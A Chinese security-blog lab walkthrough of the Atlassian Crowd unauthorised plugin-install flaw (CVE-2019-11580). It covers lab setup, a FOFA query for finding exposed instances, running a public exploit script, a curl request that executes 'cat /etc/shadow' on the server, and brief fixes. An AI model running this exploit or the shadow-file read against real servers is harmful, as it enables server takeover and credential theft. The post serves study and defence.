二十三:Altassian Crowd未授权访问漏洞

已于 2024-08-06 09:19:01 修改
阅读量504 收藏 8
点赞数 4
分类专栏: 未授权访问漏洞 文章标签: couchdb CouchDB未授权访问
于 2024-08-06 09:18:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63988455/article/details/140934532
版权

Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品Atlassian Crowd是一套基于Web的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center是Crowd的集群部署版。AtlassianCrowd和Crowd Data Center在其某些发行版本中错误地启用了pdkinstal开发插件,使其存在安全漏洞。攻击者利用该漏洞可在未授权访问的情况下对Atlassian Crowd和Crowd DataCenter安装任意的恶意插件,执行任意代码/命令,从而获得服务器权限。其端口:8095

  • 影响版本:
  • 2.1.0 <= version < 3.0.5 
  • 3.1.0<= version < 3.1.6
  • 3.2.0 <= version< 3.2.8
  • 3.3.0 <= version< 3.3.5
  • 3.4.0 <= version < 3.4.4

》》》环境搭建《《《
步骤一:准备一台Ubuntu虚拟机并执行以下命令下载搭建 Atlassian-crowd-3.4.3.#下载crowd3.4.3的版本,进行测试。
wget https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.4.3.zip

步骤二:搭建Java环境并查看JDK版本..

搭建Java环境

#sudo apt-get install openjdk-8-jdk

查看JDK版本#

Java -vesion

步骤三:解压缩文件并移动到指定位置.
# 解压缩文件
unzip atlassian-crowd-3.4.3.zip


# 移动文件atlassian-crowd-3.4.3到/var目录下

sudo cp-r atlassian-crowd-3.4.3 /var/


#到该目录下
cd /var/atlassian-crowd-3.4.3/crowd-webapp/WEB-INF/classes/

步骤四:修改配置文件并添加信息..

配置文件sudo vi crowd-init.properties
添加信息
crowd.home=/var/atlassian-crowd-3.4.3
开启服务#sudo sh start_crowd.sh
访问页面#http://192.168.116.132:8095/

步骤五:点击Set up Crowd需要申请key,复制Server ID;进入以下官网并点击New TrialLicense申请key...

步骤六:进去后,填写信息和上方复制的ServerID,会生成一个key,复制key..

步骤七:将上方的key,粘贴到下方license key中..点击continue进入如下页面,选择Embedded,点击continue...

步骤八:进入配置信息,无需修改,点击continue.点击continue,其中配置登录账号密码...点击 continue ,跳转到登录页面,输入刚才配置的账户密码..登录即可!

Fofa
title="Atlassian Crowd - Login'icon_hash="-1231308448'

》》》漏洞复现《《《

步骤一:下载攻击脚本到本地.

git clone https://github.com/jas502n/CVE-2019-11580

cd CVE-2019-11580/

步骤二:执行攻击命令并验证.

python2 CVE-2019-11580.py http://192.168.116.132:8095/

curl http://192.168.116.132:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow

》》》漏洞修复《《《

1.设置访问/crowd/admin/uploadplugin.action的源ip.
2.升级最新版本(3.5.0以上)。

starhei.zxy
关注
专栏目录
二十八种授权访问漏洞合集(暂时最全)
墨痕诉清风的博客
01-04 4835
目录 0x01 授权漏洞预览 0x02 Active MQ 授权访问 0x03 Atlassian Crowd 授权访问 0x04 CouchDB 授权访问 0x05 Docker 授权访问 0x06 Dubbo 授权访问 0x07 Druid 授权访问 0x08 Elasticsearch 授权访问 0x09 FTP 授权访问 0x10 HadoopYARN 授权访问 0x11 JBoss 授权访问 0x12 Jenkins 授权访问 0x13 Jupyt
Atlassian Crowd 授权访问漏洞
玄道的网安博客
12-17 1189
简介 Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品。Atlassian Crowd是一套基于Web的单点登录系统。该系统为用用户、网络应用程序和目录服务器提供验证、授权等功能。 漏洞概述 Atlassian Crowd Data Center是Crowd的集群部署版。Atlassian Crowd和Crowd Data Center在其某些发行版本中错误地启用了了pdkinstall开发插件,使其存在安全漏漏..
漏洞防范与应对:从发现到修复的全攻略】Prometheus Pushgateway推送网关 存在授权访问漏洞 ,处理过程详解!!!
大唐有趣的小胡.
05-11 3023
本文详细介绍了Prometheus Pushgateway推送网关存在的授权访问漏洞及其处理过程。该漏洞允许授权的用户访问Pushgateway,可能导致敏感信息泄露或系统被恶意利用。文章首先分析了漏洞产生的原因,然后给出了具体的处理步骤,包括限制访问权限、更新配置文件、重启服务等。同时,强调了及时修复漏洞的重要性,并提供了防范类似漏洞的建议。通过本文的指南,读者可以了解如何发现并应对Prometheus Pushgateway推送网关的授权访问漏洞,确保系统的安全性和稳定性。
常见授权访问漏洞
最新发布
weixin_60838266的博客
07-17 2437
由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由的情况下可以执行任意方法,从而导致远程命令执行漏洞。受影响的版本包括 5.0 和 5.1 版本(即默认情况下)。
授权访问漏洞原理以及修复方法
it知识分享 free for nothing..
12-20 5042
授权访问漏洞 原理以及修复方法
prometheus监控软件的使用
qq_48391148的博客
09-07 3601
运维工作离不开监控 工具或者软件去帮助我们7*24监控我们的服务器和软件,是否还在正常的工作。如果不工作,马上告警(短信,电话,微信,钉钉),及时处理。 监控的价值: 防范事故与然,减少事故带来的损失。 及时的发现问题,提醒工程师尽快的去解决问题,减少公司的损失
Grafana 授权任意文件读取漏洞(CVE-2021-43798)
m0_58596609的博客
12-27 2407
Grafana 授权任意文件读取漏洞(CVE-2021-43798)
Atlassian Crowd 授权访问漏洞(详细版)
weixin_43061533的博客
12-15 2094
0x01 漏洞简述 Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品。Atlassian Crowd是一套基于Web的单点登录系统。该系统为用用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center是Crowd的集群部署版。Atlassian Crowd和Crowd Data Center在其某些发行版本中错误地启用了了pdkinstall开发插件,使其存在安全漏漏洞洞。攻击者利
Redis授权访问漏洞
周星星的博客
08-22 1575
Redis授权访问漏洞复现以及利用
授权访问漏洞
weixin_43873557的博客
02-05 806
授权概述 授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导 致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信 息泄露。 Redis 授权访问漏洞 MongoDB 授权访问漏洞 Jenkins 授权访问漏洞 Memcached 授权访问漏洞 JBOSS 授权访问漏洞 VNC 授权访问漏洞 Docker 授权访问漏洞 ZooKeeper 授权访问漏洞 Rsync 授权访问漏洞 Atlassian Crowd 授权访问漏洞 CouchDB
PROMETHEUS安全漏洞分析
yua7190的博客
09-06 7304
Prometheus是一套开源的监控、告警、时间序列数据库的组合工具。与Kubernetes由Google内部Borg系统演变而来相似,Prometheus由Google内部的Borgmon[6]监控系统演变而来,最初在2012年由前Google工程师Matt T. Proud于SoundCloud[5]进行研发使用并在短时间内迅速受到业界广泛认可,后于2015年初在GitHub上开源,目前已有42.2K的Star数和7.1的Fork数。
Grafana 授权任意文件读取 0day 漏洞复现
yoyo_573的博客
12-21 3002
Grafana 授权任意文件读取 0day 漏洞
CVE-2021-43798——Grafana 授权任意文件读取
LiBai'S BLOG
12-18 1万+
Grafana 授权任意文件读取~
prometheus监控之alertmanager安装配置(2)及接入电话报警微信、短信、邮件等告警
akzp123的博客
12-04 1万+
电话报警使用OPSALERT点击了解更多(支持电话报警、短信报警、邮件告警、微信报警)直接使用webhook配置即可,比较简单。 介绍 Prometheus 将数据采集和报警分成两个模块。报警规则配置在Prometheus Servers上,然后发送报警信息到AlertManger,Alertmanager 对收到的告警信息进行处理,包括去重,降噪,分组,沉默,抑制,策略路由,告警通知。 流程 Alertmanager 接收到告警,根据labels判断属于哪些Route(可存在多个Route,...
【后端-监控系统】2、prometheus、exporter、grafana、alertmanager 生态超详细介绍
呆呆的猫的博客
11-15 3035
prometheus、grafana、alertManager、exporter 生态超详细介绍
Grafana任意文件读取漏洞(CVE-2021-43798)
热门推荐
chaojixiaojingang
03-14 2万+
1.漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。授权的攻击者利用该漏洞,能够获取服务器敏感文件。 2.影响版本 Grafana 8.0.0 - 8.3.0 3.漏洞环境搭建 更新vulhub目录,进入vulhub/grafana/CVE-2021-43798 docker-compose up –d #下载安装漏洞镜像 访问目标3000端口 4.漏洞复现 访问...
Grafana任意文件读取漏洞(CVE-2021-43798)复现
小小猪的博客
12-24 2256
Grafana任意文件读取漏洞(CVE-2021-43798)复现 漏洞描述: Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 漏洞影响范围: Grafana 8.0.0 - 8.3.0 环境搭建: 采用vulfocus靶场 地址 漏洞复现: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值